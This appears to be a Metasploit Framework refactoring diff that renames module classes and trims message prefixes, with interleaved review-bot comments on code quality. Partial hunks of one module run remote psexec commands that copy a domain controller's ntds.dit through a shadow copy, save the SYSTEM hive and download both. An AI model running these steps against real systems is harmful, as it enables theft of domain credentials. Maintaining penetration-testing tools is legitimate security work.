+94,7 @@ class Metasploit3 < Msf::Auxiliary # then creating a new one def check_vss(text, bat) begin - print_status("#{peer} - Checking if a Volume Shadow Copy exists already.") + print_status("Checking if a Volume Shadow Copy exists already.") prepath = '\\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy' command = "%COMSPEC% /C echo vssadmin list shadows ^> #{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}" result = psexec(command) 
@@ -102,14 +102,14 @@ class Metasploit3 < Msf::Auxiliary vscs = [] data.each_line { |line| vscs << line if line.include?("GLOBALROOT") } if vscs.empty? - print_status("#{peer} - No VSC Found.") + print_status("No VSC Found.") return nil end vscpath = prepath + vscs[vscs.length - 1].to_s.split("ShadowCopy")[1].to_s.chomp - print_good("#{peer} - Volume Shadow Copy exists on #{vscpath}") + print_good("Volume Shadow Copy exists on #{vscpath}") return vscpath rescue StandardError => vsscheckerror - print_error("#{peer} - Unable to determine if VSS is enabled: #{vsscheckerror}") + print_error("Unable to determine if VSS is enabled: #{vsscheckerror}") return nil end end @@ -120,16 +120,16 @@ class Metasploit3 < Msf::Auxiliary begin #Try to create the shadow copy command = "%COMSPEC% /C echo #{createvsc} ^> #{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}" - print_status("#{peer} - Creating Volume Shadow Copy") + print_status("Creating Volume Shadow Copy") out = psexec(command) #Get path to Volume Shadow Copy vscpath = get_vscpath(text) rescue StandardError => vscerror - print_error("#{peer} - Unable to create the Volume Shadow Copy: #{vscerror}") + print_error("Unable to create the Volume Shadow Copy: #{vscerror}") return nil end if vscpath - print_good("#{peer} - Volume Shadow Copy created on #{vscpath}") + print_good("Volume Shadow Copy created on #{vscpath}") return vscpath else return nil @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Auxiliary end return true rescue StandardError => ntdscopyerror - print_error("#{peer} - Unable to copy ntds.dit from Volume Shadow Copy.Make sure target is a Windows Domain Controller: #{ntdscopyerror}") + print_error("Unable to copy ntds.dit from Volume Shadow Copy.Make sure target is a Windows Domain Controller: #{ntdscopyerror}") return false end end 
@@ -156,7 +156,7 @@ class Metasploit3 < Msf::Auxiliary # Checks if ntds.dit was copied to the Windows Temp directory def check_ntds(text) - print_status("#{peer} - Checking if NTDS.dit was copied.") + print_status("Checking if NTDS.dit was copied.") check = "%COMSPEC% /C dir \\#{datastore['WINPATH']}\\Temp\\ntds > #{text}" run = psexec(check) output = smb_read_file(@smbshare, @ip, text) @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary command = "%COMSPEC% /C reg.exe save HKLM\\SYSTEM %WINDIR%\\Temp\\sys /y" return psexec(command) rescue StandardError => hiveerror - print_error("#{peer} - Unable to copy the SYSTEM hive file: #{hiveerror}") + print_error("Unable to copy the SYSTEM hive file: #{hiveerror}") return false end end @@ -182,7 +182,7 @@ class Metasploit3 < Msf::Auxiliary # Download the ntds.dit copy to your attacking machine def download_ntds(file) - print_status("#{peer} - Downloading ntds.dit file") + print_status("Downloading ntds.dit file") begin # Try to download ntds.dit simple.connect("\\\\#{@ip}\\#{@smbshare}") @@ -190,9 +190,9 @@ class Metasploit3 < Msf::Auxiliary data = remotefile.read remotefile.close ntds_path = store_loot("psexec.ntdsgrab.ntds", "application/octet-stream", @ip, data, "ntds.dit") - print_good("#{peer} - ntds.dit stored at #{ntds_path}") + print_good("ntds.dit stored at #{ntds_path}") rescue StandardError => ntdsdownloaderror - print_error("#{peer} - Unable to downlaod ntds.dit: #{ntdsdownloaderror}") + print_error("Unable to downlaod ntds.dit: #{ntdsdownloaderror}") return ntdsdownloaderror end simple.disconnect("\\\\#{@ip}\\#{@smbshare}") @@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary # Download the SYSTEM hive copy to your attacking machine def download_sys_hive(file) - print_status("#{peer} - Downloading SYSTEM hive file") + print_status("Downloading SYSTEM hive file") begin # Try to download SYSTEM hive simple.connect("\\\\#{@ip}\\#{@smbshare}") 
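Review bot: In `download_ntds` (hunk `@@ -190,9 +190,9 @@`) the rescue branch returns `ntdsdownloaderror` before the `simple.disconnect(...)` that follows the `begin` block, so a failed download leaves the share connection open. `remotefile.close` is also skipped when `read` raises. Moving the disconnect into an `ensure` clause of that `begin` block (`ensure` followed by `simple.disconnect("\\\\#{@ip}\\#{@smbshare}")`) covers both paths. `download_sys_hive` in hunk `@@ -209,9 +209,9 @@` has the same shape, and the changed message in this hunk still reads `downlaod`. The opening lines of both methods are outside their hunks.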
@@ -209,9 +209,9 @@ class Metasploit3 < Msf::Auxiliary data = remotefile.read remotefile.close hive_path = store_loot("psexec.ntdsgrab.hive", "application/octet-stream", @ip, data, "system-hive") - print_good("#{peer} - SYSTEM hive stored at #{hive_path}") + print_good("SYSTEM hive stored at #{hive_path}") rescue StandardError => sysdownloaderror - print_error("#{peer} - Unable to download SYSTEM hive: #{sysdownloaderror}") + print_error("Unable to download SYSTEM hive: #{sysdownloaderror}") return sysdownloaderror end simple.disconnect("\\\\#{@ip}\\#{@smbshare}") @@ -229,7 +229,7 @@ class Metasploit3 < Msf::Auxiliary end return prepath + vsc.split("ShadowCopy")[1].chomp rescue StandardError => vscpath_error - print_error("#{peer} - Could not determine the exact path to the VSC check your WINPATH") + print_error("Could not determine the exact path to the VSC check your WINPATH") return nil end end @@ -237,21 +237,21 @@ class Metasploit3 < Msf::Auxiliary # Removes files created during execution. def cleanup_after(*files) simple.connect("\\\\#{@ip}\\#{@smbshare}") - print_status("#{peer} - Executing cleanup...") + print_status("Executing cleanup...") files.each do |file| begin if smb_file_exist?(file) smb_file_rm(file) end rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror - print_error("#{peer} - Unable to cleanup #{file}. Error: #{cleanuperror}") + print_error("Unable to cleanup #{file}. Error: #{cleanuperror}") end end left = files.collect{ |f| smb_file_exist?(f) } if left.any? - print_error("#{peer} - Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") + print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") else - print_status("#{peer} - Cleanup was successful") + print_status("Cleanup was successful") end simple.disconnect("\\\\#{@ip}\\#{@smbshare}") end 
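Review bot: The rescue in hunk `@@ -229,7 +229,7 @@` binds `vscpath_error` but the rewritten message never uses it, so the operator gets no reason for the failure. The other handlers in this file append the exception to their message. Something like `print_error("Could not determine the exact path to the VSC, check your WINPATH: #{vscpath_error}")` would be consistent with them. The start of the enclosing method is outside the hunk.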
diff --git a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb index e0c7b914b6..5d809e37a6 100644 --- a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb +++ b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/upload_file.rb b/modules/auxiliary/admin/smb/upload_file.rb index b52f54f8a1..6580411c71 100644 --- a/modules/auxiliary/admin/smb/upload_file.rb +++ b/modules/auxiliary/admin/smb/upload_file.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb index 24d11c9978..6a03ca85e6 100644 --- a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb +++ b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SunRPC diff --git a/modules/auxiliary/admin/tftp/tftp_transfer_util.rb b/modules/auxiliary/admin/tftp/tftp_transfer_util.rb index 9618c5eed9..d02081daa8 100644 --- a/modules/auxiliary/admin/tftp/tftp_transfer_util.rb +++ b/modules/auxiliary/admin/tftp/tftp_transfer_util.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Rex::Proto::TFTP include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/tikiwiki/tikidblib.rb b/modules/auxiliary/admin/tikiwiki/tikidblib.rb index 5e63df3926..5ed08b4865 100644 --- a/modules/auxiliary/admin/tikiwiki/tikidblib.rb 
+++ b/modules/auxiliary/admin/tikiwiki/tikidblib.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/upnp/soap_portmapping.rb b/modules/auxiliary/admin/upnp/soap_portmapping.rb index 4ddc743e52..a7d4a52622 100644 --- a/modules/auxiliary/admin/upnp/soap_portmapping.rb +++ b/modules/auxiliary/admin/upnp/soap_portmapping.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize diff --git a/modules/auxiliary/admin/vmware/poweroff_vm.rb b/modules/auxiliary/admin/vmware/poweroff_vm.rb index 08d8294543..0069b455de 100644 --- a/modules/auxiliary/admin/vmware/poweroff_vm.rb +++ b/modules/auxiliary/admin/vmware/poweroff_vm.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/vmware/poweron_vm.rb b/modules/auxiliary/admin/vmware/poweron_vm.rb index 826dd96338..3b20dbe4b2 100644 --- a/modules/auxiliary/admin/vmware/poweron_vm.rb +++ b/modules/auxiliary/admin/vmware/poweron_vm.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/vmware/tag_vm.rb b/modules/auxiliary/admin/vmware/tag_vm.rb index 30de864641..1c825f62f3 100644 --- a/modules/auxiliary/admin/vmware/tag_vm.rb +++ b/modules/auxiliary/admin/vmware/tag_vm.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report 
diff --git a/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb b/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb index 97b3bfb1e5..284198a04b 100644 --- a/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb +++ b/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb index 09bd23daf3..08de7df684 100644 --- a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb +++ b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp def initialize(info = {}) diff --git a/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb b/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb index 4b15e11364..d95582eace 100644 --- a/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb +++ b/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC_Client diff --git a/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb b/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb index e857b9eb34..5c737a13e8 100644 --- a/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb +++ b/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC_Client diff --git a/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb b/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb index f179f7ef4c..db348c3865 100644 
--- a/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb +++ b/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC_Client diff --git a/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb b/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb index 106dbfba96..15157e9313 100644 --- a/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb +++ b/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC_Client include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb index 4381c2addd..352625b1b8 100644 --- a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb +++ b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary peer = "#{rhost}:#{rport}" - print_status("#{peer} - Attempting to login...") + print_status("Attempting to login...") data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}" 
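Review bot: In the `@@ -56,7 +56,7 @@` hunk of edit_html_fileaccess.rb the local `peer = "#{rhost}:#{rport}"` stays as a context line, while every `#{peer}` interpolation visible in this file's hunks is removed by the commit, so the assignment looks dead. It would also shadow any `peer` method the included mixins provide. If nothing outside the visible hunks still reads it, the line should be dropped together with the prefixes. The enclosing method starts and ends outside the hunk.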
@@ -71,17 +71,17 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 302 and res.get_cookies =~ /sid/ session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || '' if session and not session.empty? - print_good "#{peer} - Authentication successful" + print_good "Authentication successful" else - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end else - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end - print_status("#{peer} - Attempting to retrieve #{datastore['RPATH']}...") + print_status("Attempting to retrieve #{datastore['RPATH']}...") traversal = "../" * datastore['DEPTH'] traversal << datastore['RPATH'] @@ -98,9 +98,9 @@ class Metasploit3 < Msf::Auxiliary loot = $1 f = ::File.basename(datastore['RPATH']) path = store_loot('webmin.file', 'application/octet-stream', rhost, loot, f, datastore['RPATH']) - print_status("#{peer} - #{datastore['RPATH']} saved in #{path}") + print_status("#{datastore['RPATH']} saved in #{path}") else - print_error("#{peer} - Failed to retrieve the file") + print_error("Failed to retrieve the file") return end diff --git a/modules/auxiliary/admin/webmin/file_disclosure.rb b/modules/auxiliary/admin/webmin/file_disclosure.rb index dceb166244..e43c5849bf 100644 --- a/modules/auxiliary/admin/webmin/file_disclosure.rb +++ b/modules/auxiliary/admin/webmin/file_disclosure.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/zend/java_bridge.rb b/modules/auxiliary/admin/zend/java_bridge.rb index f02adcbf4d..dd858742f5 100644 --- a/modules/auxiliary/admin/zend/java_bridge.rb +++ b/modules/auxiliary/admin/zend/java_bridge.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp 
diff --git a/modules/auxiliary/analyze/jtr_aix.rb b/modules/auxiliary/analyze/jtr_aix.rb index 52969f35b0..7fd0a99c39 100644 --- a/modules/auxiliary/analyze/jtr_aix.rb +++ b/modules/auxiliary/analyze/jtr_aix.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_crack_fast.rb b/modules/auxiliary/analyze/jtr_crack_fast.rb index e1137d8945..56bd36b89e 100644 --- a/modules/auxiliary/analyze/jtr_crack_fast.rb +++ b/modules/auxiliary/analyze/jtr_crack_fast.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_linux.rb b/modules/auxiliary/analyze/jtr_linux.rb index 2b3483c60f..0a7b751087 100644 --- a/modules/auxiliary/analyze/jtr_linux.rb +++ b/modules/auxiliary/analyze/jtr_linux.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary formats = [ 'md5', 'des', 'bsdi'] if datastore['Crypt'] - format << 'crypt' + formats << 'crypt' end cracker = new_john_cracker diff --git a/modules/auxiliary/analyze/jtr_mssql_fast.rb b/modules/auxiliary/analyze/jtr_mssql_fast.rb index 45980b7cbe..dd3312009e 100644 --- a/modules/auxiliary/analyze/jtr_mssql_fast.rb +++ b/modules/auxiliary/analyze/jtr_mssql_fast.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_mysql_fast.rb b/modules/auxiliary/analyze/jtr_mysql_fast.rb index 246a7c9cb1..17e54cc9c2 100644 
--- a/modules/auxiliary/analyze/jtr_mysql_fast.rb +++ b/modules/auxiliary/analyze/jtr_mysql_fast.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_oracle_fast.rb b/modules/auxiliary/analyze/jtr_oracle_fast.rb index e41d6ff806..781574011f 100644 --- a/modules/auxiliary/analyze/jtr_oracle_fast.rb +++ b/modules/auxiliary/analyze/jtr_oracle_fast.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/analyze/jtr_postgres_fast.rb b/modules/auxiliary/analyze/jtr_postgres_fast.rb index 5b0053951b..81f1549aaf 100644 --- a/modules/auxiliary/analyze/jtr_postgres_fast.rb +++ b/modules/auxiliary/analyze/jtr_postgres_fast.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/auxiliary/jtr' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary #Included to grab the john.pot and use some utiltiy functions include Msf::Auxiliary::JohnTheRipper diff --git a/modules/auxiliary/bnat/bnat_router.rb b/modules/auxiliary/bnat/bnat_router.rb index d63e805904..0225b81347 100644 --- a/modules/auxiliary/bnat/bnat_router.rb +++ b/modules/auxiliary/bnat/bnat_router.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary def initialize super( diff --git a/modules/auxiliary/bnat/bnat_scan.rb b/modules/auxiliary/bnat/bnat_scan.rb index 4757cbae8e..e5c907720b 100644 --- a/modules/auxiliary/bnat/bnat_scan.rb +++ b/modules/auxiliary/bnat/bnat_scan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Capture 
diff --git a/modules/auxiliary/client/smtp/emailer.rb b/modules/auxiliary/client/smtp/emailer.rb index 9e6831e2f3..a5f76cdeb4 100644 --- a/modules/auxiliary/client/smtp/emailer.rb +++ b/modules/auxiliary/client/smtp/emailer.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'yaml' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # # This module sends email messages via smtp diff --git a/modules/auxiliary/crawler/msfcrawler.rb b/modules/auxiliary/crawler/msfcrawler.rb index 7eb6ab4a4b..991f98e23d 100644 --- a/modules/auxiliary/crawler/msfcrawler.rb +++ b/modules/auxiliary/crawler/msfcrawler.rb @@ -17,7 +17,7 @@ require 'rinda/tuplespace' require 'pathname' require 'uri' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb index 5c047d181f..81fc69dd76 100644 --- a/modules/auxiliary/docx/word_unc_injector.rb +++ b/modules/auxiliary/docx/word_unc_injector.rb @@ -18,7 +18,7 @@ require 'msf/core' # for creating files require 'rex/zip' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::FILEFORMAT diff --git a/modules/auxiliary/dos/android/android_stock_browser_iframe.rb b/modules/auxiliary/dos/android/android_stock_browser_iframe.rb new file mode 100644 index 0000000000..9221626ed9 --- /dev/null +++ b/modules/auxiliary/dos/android/android_stock_browser_iframe.rb 
@@ -0,0 +1,62 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => "Android Stock Browser Iframe DOS", + 'Description' => %q( + This module exploits a vulnerability in the native browser that comes with Android 4.0.3. + If successful, the browser will crash after viewing the webpage. + ), + 'License' => MSF_LICENSE, + 'Author' => [ + 'Jean Pascal Pereira', # Original exploit discovery + 'Jonathan Waggoner' # Metasploit module + ], + 'References' => [ + [ 'PACKETSTORM', '118539'], + [ 'CVE', '2012-6301' ] + ], + 'DisclosureDate' => "Dec 1 2012", + 'Actions' => [[ 'WebServer' ]], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer' + ) + ) + end + + def run + exploit # start http server + end + + def setup + @html = %| + + + + + + | + end + + def on_request_uri(cli, _request) + print_status('Sending response') + send_response(cli, @html) + end +end diff --git a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb index ff25f23634..bfab3a37ac 100644 --- a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb +++ b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb b/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb index f9b0933648..786f2c16eb 100644 --- a/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb +++ b/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb 
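Review bot: In the new android_stock_browser_iframe.rb, `setup` is overridden only to assign `@html` and never calls `super`, so any `setup` defined further up the chain (by `Msf::Auxiliary` or an included mixin) is skipped. Whether one exists is not visible in this hunk, so this is worth confirming. Adding `super` as the first statement of `setup` keeps the chain intact at no cost. A one-line comment on `setup` and `on_request_uri`, such as `# Builds the page served to every client` and `# Serves the prepared page; the request itself is ignored`, would also help, since `_request` is deliberately unused.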
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Dos include Msf::Exploit::Capture diff --git a/modules/auxiliary/dos/dns/bind_tkey.rb b/modules/auxiliary/dos/dns/bind_tkey.rb index 4b29d365b7..841db2cee5 100644 --- a/modules/auxiliary/dos/dns/bind_tkey.rb +++ b/modules/auxiliary/dos/dns/bind_tkey.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb index cef333391d..93b149e2fc 100644 --- a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb +++ b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/hp/data_protector_rds.rb b/modules/auxiliary/dos/hp/data_protector_rds.rb index 11029de675..a92ee46946 100644 --- a/modules/auxiliary/dos/hp/data_protector_rds.rb +++ b/modules/auxiliary/dos/hp/data_protector_rds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/http/3com_superstack_switch.rb b/modules/auxiliary/dos/http/3com_superstack_switch.rb index 99218cc07b..4978f58c29 100644 --- a/modules/auxiliary/dos/http/3com_superstack_switch.rb +++ b/modules/auxiliary/dos/http/3com_superstack_switch.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos 
diff --git a/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb b/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb index ae5709b7d7..53b773fbb1 100644 --- a/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb +++ b/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb @@ -5,8 +5,11 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer + include Msf::Module::Deprecated + + deprecated(Date.new(2016, 4, 23), 'auxiliary/dos/android/android_stock_browser_iframe') def initialize(info = {}) super( diff --git a/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb b/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb index 28542774fb..ea62711de1 100644 --- a/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb +++ b/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos @@ -67,7 +67,7 @@ class Metasploit4 < Msf::Auxiliary c.send_request(r) # Don't wait for a response rescue ::Rex::ConnectionError => exception - print_error("#{peer} - Unable to connect: '#{exception.message}'") + print_error("Unable to connect: '#{exception.message}'") return ensure disconnect(c) if c diff --git a/modules/auxiliary/dos/http/apache_mod_isapi.rb b/modules/auxiliary/dos/http/apache_mod_isapi.rb index da932d94c9..0309563629 100644 --- a/modules/auxiliary/dos/http/apache_mod_isapi.rb +++ b/modules/auxiliary/dos/http/apache_mod_isapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos 
